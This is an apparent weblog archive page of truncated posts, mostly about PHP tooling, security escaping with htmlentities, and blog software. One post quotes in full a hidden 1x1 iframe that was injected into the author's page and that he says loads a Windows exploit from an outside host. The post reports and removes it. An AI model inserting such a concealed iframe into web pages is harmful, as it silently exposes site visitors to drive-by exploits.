After 8 years of running on a homebrew system written over a weekend, I’ve decided to try someone else’s software. What I was after was: Commenting Most of my posts are link+comment, but if I write something longer than a paragraph, I wanted to throw the post open to feedback. But I didn’t want to [...]
[ Steve Cooley via Peter Rukavina via Professional PHP ] Switch BBEdit to use the PHP website for the Find in Reference command: % defaults write \ com.barebones.bbedit Services:ADCReferenceSearchTemplate \ “http://www.php.net/%@” Link
I call them “routing scripts,” while Richard Davey calls them “transfer scripts.” They are a useful PHP technique.
Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.) He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input: $html = array(); $html['variable'] = htmlentities($_GET['variable'],ENT_QUOTES,”utf-8″); /* Code [...]
Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget. Chris Shiflet finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team. Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned [...]
Only in Silicon Valley would the anniversary of a programming language make the gossip page of an alternative paper. From the San Jose Metro’s The Fly column: This summer is the 10th anniversary of PHP’s original release date, prompting parties among its champions in Quebec, Germany and Lerdorf’s Fremont home, where he drank champagne with [...]
Rafe’s looking at weblog management systems. He started with WordPress, and was asked to try out Moveable Type too. Now he’s set up Moveable Type, WordPress, S9Y, and Textpattern. I’m interested in his opinion because I’m weighing moving this weblog to one of those systems, or moving everything to Live Journal where I have a [...]
The Savant folks have a development version of their template system for PHP5. Savant doesn’t put a template language on top of PHP, instead, the templates are written in PHP and evaluated by Savant. Savant also likes objects, you can pass them directly into a template, unlike Smarty’s preference for arrays. The new version of [...]
[ via Laughing Meme ] PHPGuru describes his method for setting up the folders of a new PHP application. The bonus, using the __FILE__ idiom to set up portable paths. He has this in his config.php: <?php $_PATHS["base"] = dirname(dirname(__FILE__)) . “/”; $_PATHS["includes"] = $_PATHS["base"] . “includes/”; $_PATHS["templates"] = $_PATHS["base"] . “templates/”; $_PATHS["pear"] = $_PATHS["base"] [...]
Earth is really full of things. — The King of All Cosmos, in Katamari Damacy It’s New Year’s Eve, and I didn’t play as much Katamari Damacy or World of Warcraft over the holiday break as I wanted. I was working on this end of the year post. Here’s my stab at a ‘best of [...]
Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page. <div style=”visibility: hidden; position: absolute; left: 1; top: 1″><iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body> The hidden iFrame loads a Windows exploit. I have it removed, for the time being. I don’t know how [...]
[ via Simon Willison ] Another Simon, a developer at Microsoft, writes about his surprise with all of the non-document applications of XML (SOAP, databases, configuration files) out there, and his experience with what he feels are the two problem areas of the original specification: whitespace handling and allowed characters. After writing a publishing tool [...]
I’m a little bothered by all the sniping between the various scripting language camps: Lisp bashes Python, Perl bashes PHP, everyone bashes Java. But anyone can walk up, hand $10 to a hosting company, and start serving PHP + MySQL applications. If you want to run Perl, Python, Ruby or anything else, you need to [...]
Kellan points out a feature of PEAR I’d missed. Packages such as XML_Serializer haven’t reached ‘stable’. So to install them, I’d been changing PEAR’s config to accept ‘beta’, then install. Instead, you direct PEAR to install a specific version.
You may need to have MySQL installed to get it to work, but hell yeah! Update: this post refers to an older version PHP5. go to his main PHP page for the latest version.